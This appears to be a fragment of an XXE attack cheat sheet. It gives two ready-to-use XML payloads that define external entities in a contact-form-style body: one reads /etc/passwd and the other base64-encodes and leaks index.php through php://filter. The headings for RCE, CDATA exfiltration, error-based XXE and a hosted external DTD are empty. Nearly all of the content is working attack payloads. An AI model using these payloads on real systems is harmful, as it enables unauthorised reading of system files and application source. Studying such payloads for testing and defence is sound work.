XXE
LFI
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "file:///etc/passwd">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
LFI Encoded
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
RCE
CDATA Exfiltration
Error Based XXE
Host this external dtd on our server
Last updated